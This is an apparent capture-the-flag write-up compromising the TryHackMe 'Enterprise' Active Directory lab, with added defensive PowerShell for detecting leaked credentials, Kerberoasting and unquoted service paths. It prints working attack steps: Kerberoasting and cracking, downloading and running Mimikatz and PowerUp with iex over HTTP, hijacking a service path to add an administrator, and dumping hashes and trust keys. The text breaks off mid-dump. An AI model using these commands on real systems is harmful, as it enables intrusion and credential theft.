Service Enumeration

Port scan

root@ip-10-10-208-107:~# nmap -p- 10.10.59.205 --open
Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-04 02:48 GMT
Nmap scan report for ip-10-10-248-133.eu-west-1.compute.internal (10.10.59.205)
Host is up (0.0039s latency).
Not shown: 61918 closed ports, 3588 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
5985/tcp  open  wsman
7990/tcp  open  unknown
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown
49673/tcp open  unknown

Service version detection

root@ip-10-10-208-107:~# nmap -sV -Pn 10.10.59.205 -p 53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5357,5985,7990,9389,47001,49664-49673
Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-04 02:57 GMT
Nmap scan report for ip-10-10-248-133.eu-west-1.compute.internal (10.10.59.205)
Host is up (0.00075s latency).

PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Microsoft DNS
80/tcp    open   http          Microsoft IIS httpd 10.0
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-04 02:57:49Z)
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
3389/tcp  open   ms-wbt-server Microsoft Terminal Services
5357/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7990/tcp  open   http          Microsoft IIS httpd 10.0
9389/tcp  open   mc-nmf        .NET Message Framing
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp closed unknown
49668/tcp open   msrpc         Microsoft Windows RPC
49669/tcp open   msrpc         Microsoft Windows RPC
49670/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open   msrpc         Microsoft Windows RPC
49672/tcp closed unknown
49673/tcp open   msrpc         Microsoft Windows RPC
MAC Address: 02:CC:01:6E:8F:D9 (Unknown)
Service Info: Host: LAB-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.08 seconds

smb

Enumerating shares

┌──(rootkali)-[~/tryhackme/Enterprise]
└─# crackmapexec smb 10.10.59.205 -u '' -p '' --shares
SMB         10.10.59.205   445    LAB-DC           [*] Windows 10.0 Build 17763 x64 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (signing:True) (SMBv1:False)
SMB         10.10.59.205   445    LAB-DC           [-] LAB.ENTERPRISE.THM\: STATUS_ACCESS_DENIED 
SMB         10.10.59.205   445    LAB-DC           [-] Error enumerating shares: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

Anonymous login is not allowed, but we still obtained:
Domain name: LAB.ENTERPRISE.THM
DC server name: LAB-DC

Enumerating again with smbclient, this time the shares are listed:

┌──(rootkali)-[~/tryhackme/Enterprise]
└─# smbclient --no-pass -L //10.10.59.205

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Docs            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        Users           Disk      Users Share. Do Not Touch!
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.59.205 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Users

The share can be opened with a null session:

┌──(rootkali)-[~/tryhackme/Enterprise]
└─# smbclient --no-pass //10.10.59.205/Users
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Thu Mar 11 21:11:49 2021
  ..                                 DR        0  Thu Mar 11 21:11:49 2021
  Administrator                       D        0  Thu Mar 11 16:55:48 2021
  All Users                       DHSrn        0  Sat Sep 15 03:28:48 2018
  atlbitbucket                        D        0  Thu Mar 11 17:53:06 2021
  bitbucket                           D        0  Thu Mar 11 21:11:51 2021
  Default                           DHR        0  Thu Mar 11 19:18:03 2021
  Default User                    DHSrn        0  Sat Sep 15 03:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:16:48 2018
  LAB-ADMIN                           D        0  Thu Mar 11 19:28:14 2021
  Public                             DR        0  Thu Mar 11 16:27:02 2021

                15587583 blocks of size 4096. 9920786 blocks available

Compile a user list from the profile folders:

Administrator
atlbitbucket
bitbucket
LAB-ADMIN

Tried checking whether any of the users above have Kerberos pre-authentication disabled.

Found a user credential file:

smb: \LAB-ADMIN\AppData\Local\Microsoft\Credentials\> ls
  .                                 DSn        0  Thu Mar 11 19:28:46 2021
  ..                                DSn        0  Thu Mar 11 19:28:46 2021
  DFBE70A7E5CC19A398EBF1B96859CE5D   AHSn    11152  Thu Mar 11 18:09:04 2021

                15587583 blocks of size 4096. 9919566 blocks available

Looking this up, it is a saved RDP login credential, but it also seems there is no way to crack it.

Docs

┌──(rootkali)-[~/tryhackme/Enterprise]
└─# smbclient --no-pass //10.10.59.205/Docs
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Mar 14 22:47:35 2021
  ..                                  D        0  Sun Mar 14 22:47:35 2021
  RSA-Secured-Credentials.xlsx        A    15360  Sun Mar 14 22:46:54 2021
  RSA-Secured-Document-PII.docx       A    18432  Sun Mar 14 22:45:24 2021

There are two Office files, but they are password-protected. Converted them with office2john.py into hashes that john can recognize and ran john against them, but got no result.

http

Port 80 has nothing useful.

Port 7990 is also an HTTP port. It appears to run a web app called ATLASSIAN, but it is actually just a static page.

The login box carries one line of text:

Reminder to all Enterprise-THM Employees: We are moving to Github!

Googling "enterprise-thm github" turned up the organisation's GitHub page.

It has only one project, About-US.

The maintainer is a user called Nik-enterprise-dev. Their profile also has a PowerShell project, which contains a single script:

Import-Module ActiveDirectory
$userName = ''
$userPassword = ''
$psCreds = ConvertTo-SecureString $userPassword -AsPlainText -Force
$Computers = New-Object -TypeName "System.Collections.ArrayList"
$Computer = $(Get-ADComputer -Filter * | Select-Object Name)
for ($index = -1; $index -lt $Computer.count; $index++) { Invoke-Command -ComputerName $index {systeminfo} }

The username and password are both empty in the current version.

Opening the script's History page and going to the earlier version, the username and password are still recorded there:

Import-Module ActiveDirectory
$userName = 'nik'
$userPassword = 'ToastyBoi!'
$psCreds = ConvertTo-SecureString $userPassword -AsPlainText -Force
$Computers = New-Object -TypeName "System.Collections.ArrayList"
$Computer = $(Get-ADComputer -Filter * | Select-Object Name)
for ($index = -1; $index -lt $Computer.count; $index++) { Invoke-Command -ComputerName $index {systeminfo} }

We now have a set of domain user credentials:

nik:ToastyBoi!
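Removing a secret from the latest commit does not remove it from the repository: every earlier revision is still served by the History page, which is exactly what happened here. The following PowerShell is an added example, not part of this write-up or of the Nik-enterprise-dev project, showing how a maintainer can scan their own history for hard-coded credential assignments before (or after) publishing. The variable-name keywords and the sample history below are assumptions constructed for the example.

```powershell
# Added example (not from the write-up): find hard-coded credential assignments
# in PowerShell scripts anywhere in a repository's history. Live use:
#   git log -p --all | Find-HardcodedCredential
function Find-HardcodedCredential {
    [CmdletBinding()]
    param(
        [Parameter(ValueFromPipeline = $true)]
        [string[]]$Line
    )
    begin {
        # Variable names that commonly hold secrets (assumed keyword list)
        $secretVar  = '\$\w*(?:pass|pwd|secret|token|apikey)\w*'
        # A diff line (+ added, - removed, or context) assigning a NON-empty string literal;
        # -match is case-insensitive by default, so $UserPassword is caught too
        $assignment = "^[+-]?\s*(?<var>$secretVar)\s*=\s*['""](?<val>[^'""]+)['""]"
        $commit   = $null
        $findings = @()
    }
    process {
        foreach ($l in $Line) {
            if ($l -match '^commit ([0-9a-f]{7,40})') { $commit = $Matches[1]; continue }
            if ($l -match $assignment) {
                $findings += [pscustomobject]@{
                    Commit   = $commit
                    Variable = $Matches['var']
                    # Report only the length, never the secret itself
                    Length   = $Matches['val'].Length
                    Removed  = $l.StartsWith('-')   # still recoverable from history
                }
            }
        }
    }
    end { $findings }
}

# Constructed stand-in for `git log -p --all` output (not real repository data):
# the newest commit blanks the values, the older one still contains them.
$sampleHistory = @'
commit 2222222222222222222222222222222222222222
    remove credentials before publishing
-$userName = 'nik'
-$userPassword = 'ExamplePass1!'
+$userName = ''
+$userPassword = ''
commit 1111111111111111111111111111111111111111
    add inventory script
+Import-Module ActiveDirectory
+$userName = 'nik'
+$userPassword = 'ExamplePass1!'
'@ -split "`r?`n"

$sampleHistory | Find-HardcodedCredential | Format-Table
```

The empty-string assignments in the newest commit produce no finding; the removed line in that same commit and the added line in the older commit both do, which is the point: a finding marked Removed still needs the secret rotated and the history rewritten, not just a new commit.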

Find SPNs

┌──(rootkali)-[~/tryhackme/Enterprise]
└─# python3 /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.59.205 lab.enterprise.thm/nik:ToastyBoi! -request -outputfile hash.txt
Impacket v0.9.24.dev1+20210814.5640.358fc7c6 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name       MemberOf                                                     PasswordLastSet             LastLogon                   Delegation 
--------------------  ---------  -----------------------------------------------------------  --------------------------  --------------------------  ----------
HTTP/LAB-DC           bitbucket  CN=sensitive-account,CN=Builtin,DC=LAB,DC=ENTERPRISE,DC=THM  2021-03-11 20:20:01.333272  2021-04-26 11:16:41.570158             

We get one user account with an SPN; crack the requested TGS hash with john:

┌──(rootkali)-[~/tryhackme/Enterprise]
└─# cat hash.txt
$krb5tgs$23$*bitbucket$LAB.ENTERPRISE.THM$lab.enterprise.thm/bitbucket*$d286d86f986ebc5ed08752398bfa566a$...

┌──(rootkali)-[~/tryhackme/Enterprise]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
littleredbucket  (?)
1g 0:00:00:01 DONE (2022-03-04 00:56) 0.8620g/s 1354Kp/s 1354Kc/s 1354KC/s livelife93..liss27
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Account: bitbucket
Password: littleredbucket
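Two things made this step cheap: the service account has a password that rockyou.txt contains, and the TGS was issued with RC4 (etype 23), the cheapest type to crack. Both are visible to a defender. The block below is an added example, not from this write-up: a detection that runs over Security event 4769 records and flags RC4 service-ticket requests for user (non-computer) accounts, which is the footprint GetUserSPNs.py leaves on the DC. The event field names follow the 4769 schema; the records themselves are constructed for the example, and the allow-list is an assumption.

```powershell
# Added example (not from the write-up): flag Kerberoast-style TGS requests in
# Security event 4769 data. TicketEncryptionType 0x17 is RC4-HMAC; a user
# account's SPN being requested with RC4 is the pattern seen above.
function Find-KerberoastRequest {
    param(
        # Objects carrying the 4769 EventData fields (see usage note for Get-WinEvent)
        [Parameter(Mandatory)] [object[]]$Event,
        # Service accounts that legitimately still need RC4; assumption: none
        [string[]]$Allowlist = @()
    )
    $Event |
        Where-Object {
            $_.TicketEncryptionType -eq '0x17' -and   # RC4-HMAC
            $_.Status -eq '0x0' -and                  # ticket was issued
            $_.ServiceName -notlike '*$' -and         # computer accounts end in $
            $_.ServiceName -ne 'krbtgt' -and
            $Allowlist -notcontains $_.ServiceName
        } |
        Group-Object TargetUserName, IpAddress |
        ForEach-Object {
            [pscustomobject]@{
                Requester   = $_.Group[0].TargetUserName
                SourceIp    = $_.Group[0].IpAddress
                RC4Services = ($_.Group.ServiceName | Sort-Object -Unique) -join ','
                Count       = $_.Count
            }
        }
}

# Constructed sample records (not real log data): one RC4 request for the
# bitbucket SPN, one AES request for the DC's own account, one AES TGT renewal.
$sample = @(
    [pscustomobject]@{ TargetUserName = 'nik@LAB.ENTERPRISE.THM';  ServiceName = 'bitbucket'; TicketEncryptionType = '0x17'; Status = '0x0'; IpAddress = '::ffff:10.11.63.196' },
    [pscustomobject]@{ TargetUserName = 'nik@LAB.ENTERPRISE.THM';  ServiceName = 'LAB-DC$';   TicketEncryptionType = '0x12'; Status = '0x0'; IpAddress = '::ffff:10.11.63.196' },
    [pscustomobject]@{ TargetUserName = 'Cake@LAB.ENTERPRISE.THM'; ServiceName = 'krbtgt';    TicketEncryptionType = '0x12'; Status = '0x0'; IpAddress = '::ffff:10.10.59.5' }
)

Find-KerberoastRequest -Event $sample | Format-Table
```

Only the first record is reported. For live data, read the events with Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} on the DC and pull the named fields out of ([xml]$event.ToXml()).Event.EventData.Data before passing them in. On the mitigation side, the GetUserSPNs output shows bitbucket sitting in the sensitive-account group: a service account with an SPN should hold no privileged membership, should have a long random password (or be a group managed service account), and should have msDS-SupportedEncryptionTypes restricted to AES so that RC4 tickets are never issued for it.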

Use the command below to RDP into the target:

xfreerdp /f /u:bitbucket /p:littleredbucket /v:10.10.59.205 /size:1280x1030

The user flag is on the desktop.

Local Privilege Escalation

Start a simple HTTP server on Kali and pull the enumeration and privilege-escalation tools onto the target over HTTP:

iex (iwr http://10.11.63.196/PowerView.ps1 -UseBasicParsing)
iex (iwr http://10.11.63.196/SharpHound.ps1 -UseBasicParsing)
iex (iwr http://10.11.63.196/Invoke-Mimikatz.ps1 -UseBasicParsing)
iex (iwr http://10.11.63.196/PowerUp.ps1 -UseBasicParsing)

Enumerate all domain users:

PS C:\Users\bitbucket> get-netuser|select cn

cn
--
Administrator
Guest
atlbitbucket
krbtgt
BitBucker
nik
REPLICATION
spooks
Korone
Banana
Cake
Contractor
Varg
Joiner

Enumerate all Domain Admins:

PS C:\Users\bitbucket\Desktop> Get-NetGroupMember -GroupName "Domain Admins" -Recurse |select MemberName

MemberName
----------
joiner
Cake
korone
Administrator

Collect domain information with SharpHound:

Invoke-BloodHound -CollectionMethod All -verbose

To get the collected files from the target back to Kali, SMB is used here: since we have bitbucket's credentials, the files can be dropped into bitbucket's folder under the Users share and then downloaded over SMB.

Running PowerUp reveals a service with an unquoted service path:

[*] Checking for unquoted service paths...

ServiceName    : zerotieroneservice
Path           : C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'zerotieroneservice' -Path <HijackPath>
CanRestart     : True

ServiceName    : zerotieroneservice
Path           : C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'zerotieroneservice' -Path <HijackPath>
CanRestart     : True

A quick test confirms that files can be written to C:\Program Files (x86)\Zero Tier\ and that we have permission to restart the service.

Use PowerUp's Write-ServiceBinary to write a Zero.exe there:

PS C:\Program Files (x86)\Zero Tier> Write-ServiceBinary -Name 'zerotieroneservice' -Path 'C:\Program Files (x86)\Zero Tier\Zero.exe'

ServiceName        Path                                      Command
-----------        ----                                      -------
zerotieroneservice C:\Program Files (x86)\Zero Tier\Zero.exe net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add

This step mainly creates a user called john with the password Password123! and adds john to the local Administrators group.

The binary now exists in the target directory:

PS C:\Program Files (x86)\Zero Tier> ls

    Directory: C:\Program Files (x86)\Zero Tier

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        3/14/2021   6:08 PM                Zero Tier One
-a----         3/4/2022  12:58 AM              6 1.txt
-a----         3/4/2022   1:01 AM          22016 Zero.exe

Restart the service:

PS C:\Program Files (x86)\Zero Tier> sc.exe stop zerotieroneservice
[SC] ControlService FAILED 1062:

The service has not been started.

PS C:\Program Files (x86)\Zero Tier> sc.exe start zerotieroneservice

SERVICE_NAME: zerotieroneservice
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 5348
        FLAGS              :

Now open a shell from the desktop with "Run as administrator" and enter the credentials john:Password123!

This gives a shell with administrator privileges:

PS C:\Windows\system32> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ============================================
lab-enterprise\john S-1-5-21-2168718921-3906202695-65158103-1120

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ===============================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

The account is now a member of BUILTIN\Administrators.

Read root.txt:
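The escalation above needed two conditions together: an unquoted image path with spaces in it, and a directory along that path where ordinary users may create files (PowerUp reported BUILTIN\Users holding WriteData/AddFile on C:\). The PowerShell below is an added example, not from this write-up or from PowerUp, written for the administrator who wants to audit and fix this on their own hosts: it lists every phantom binary the service control manager would try before the real one, checks directory ACLs for low-privileged write access, and builds the quoted path that closes the hole. The service object at the bottom is constructed from the PowerUp output above.

```powershell
# Added example (not from the write-up): audit services for unquoted image paths
# containing spaces, list the phantom binaries the service control manager would
# try first, and produce the quoted path that fixes it.
function Get-UnquotedServicePath {
    param(
        # Objects with Name and PathName, as returned by Get-CimInstance Win32_Service
        [object[]]$Service = (Get-CimInstance Win32_Service)
    )
    foreach ($svc in $Service) {
        $path = [string]$svc.PathName
        # Empty or already quoted paths are not affected
        if ($path -eq '' -or $path.StartsWith('"')) { continue }
        # Split the executable from any trailing arguments (first ".exe" wins)
        if (-not ($path -match '^(?<exe>.*?\.exe)(?<rest>.*)$')) { continue }
        $exe = $Matches['exe']; $rest = $Matches['rest']
        if ($exe -notmatch ' ') { continue }          # no space, no ambiguity
        # CreateProcess tries each space-delimited prefix as "<prefix>.exe" in turn
        $parts = $exe.Split(' ')
        $candidates = for ($i = 1; $i -lt $parts.Count; $i++) {
            ($parts[0..($i - 1)] -join ' ') + '.exe'
        }
        [pscustomobject]@{
            Name          = $svc.Name
            PathName      = $path
            Candidates    = $candidates
            FixedPathName = '"' + $exe + '"' + $rest
        }
    }
}

# Can ordinary users create files in a directory? That is what turns a phantom
# path into a real problem.
function Test-UsersCanCreateFiles {
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $lowPriv = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        # CreateFiles (WriteData) is bit 0x2 of FileSystemRights
        if ($ace.AccessControlType -eq 'Allow' -and
            $lowPriv -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights -band 2) -ne 0)) { return $true }
    }
    return $false
}

# Constructed sample mirroring the service PowerUp reported above
$sample = [pscustomobject]@{
    Name     = 'zerotieroneservice'
    PathName = 'C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe'
}
$result = Get-UnquotedServicePath -Service $sample
$result | Format-List

# On a live host, report only the candidates whose directory is writable:
foreach ($c in $result.Candidates) {
    $dir = Split-Path -Parent $c
    if (Test-UsersCanCreateFiles -Directory $dir) { "exposed: $c" }
}

# Remediation, run as an administrator (the escaped inner quotes are required),
# followed by removing the BUILTIN\Users create-file right from the directory:
#   sc.exe config zerotieroneservice binPath= "\"C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe\""
```

For the page's service the function yields six candidates, from C:\Program.exe down to C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier.exe, and the fourth of them (C:\Program Files (x86)\Zero Tier\Zero.exe) is exactly where the write-up placed its binary. Without arguments the function walks the live service list, so the same script doubles as a scheduled compliance check; for the ACL side, expect Test-UsersCanCreateFiles to return $true for C:\ on this host, matching PowerUp's ModifiablePath finding.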

PS C:\users\Administrator\Desktop> type .\root.txt
THM{1a1fa948754212963...}

Cross-domain (unsuccessful)

Enumerate all trust relationships:

PS C:\users\bitbucket\Desktop> Get-NetForestDomain -Verbose | Get-NetDomainTrust

SourceName         TargetName       TrustType TrustDirection
----------         ----------       --------- --------------
LAB.ENTERPRISE.THM ENTERPRISE.THM ParentChild  Bidirectional
LAB.ENTERPRISE.THM morimori.com      Kerberos       Outbound

There is a bidirectional trust with the parent domain.

Dump all NTLM hashes with Mimikatz:

PS C:\users\Administrator\Desktop> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /patch
Domain : LAB-ENTERPRISE / S-1-5-21-2168718921-3906202695-65158103

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 8537943ee84c50d9d4035c519ce2cb68

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 43c1c941c7f0eb3a74d8864ab7dfa212
<skip>

Open a shell as Administrator by passing the hash:

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:LAB.ENTERPRISE.THM /ntlm:8537943ee84c50d9d4035c519ce2cb68 /run:powershell.exe"'

Dump the trust keys held by the DC:

PS C:\Windows\system32> Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName LAB-DC.LAB.ENTERPRISE.THM

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::trust /patch

Current domain: LAB.ENTERPRISE.THM (LAB-ENTERPRISE / S-1-5-21-2168718921-3906202695-65158103)

Domain: ENTERPRISE.THM (ENTERPRISE / S-1-5-21-1835041512-953509921-1126143443)
 [  In ] LAB.ENTERPRISE.THM -> ENTERPRISE.THM
    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c
        * aes256_hmac       eb0a1f52c2e7f30dbcf02a1737e2527da685a36d511e6b96da5d3517ba91a73c
        * aes128_hmac       7eed741499c0611a0275bfd2d83b0de1
        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f

 [ Out ] ENTERPRISE.THM -> LAB.ENTERPRISE.THM
    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c
        * aes256_hmac       643128314165f87c41041f07c13490fc0d96189f45c2eb3efcaa956707dd5a5e
        * aes128_hmac       3872b51d2e6716a863060cf1c00e4980
        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f

 [ In-1] LAB.ENTERPRISE.THM -> ENTERPRISE.THM
    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c
        * aes256_hmac       eb0a1f52c2e7f30dbcf02a1737e2527da685a36d511e6b96da5d3517ba91a73c
        * aes128_hmac       7eed741499c0611a0275bfd2d83b0de1
        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f

 [Out-1] ENTERPRISE.THM -> LAB.ENTERPRISE.THM
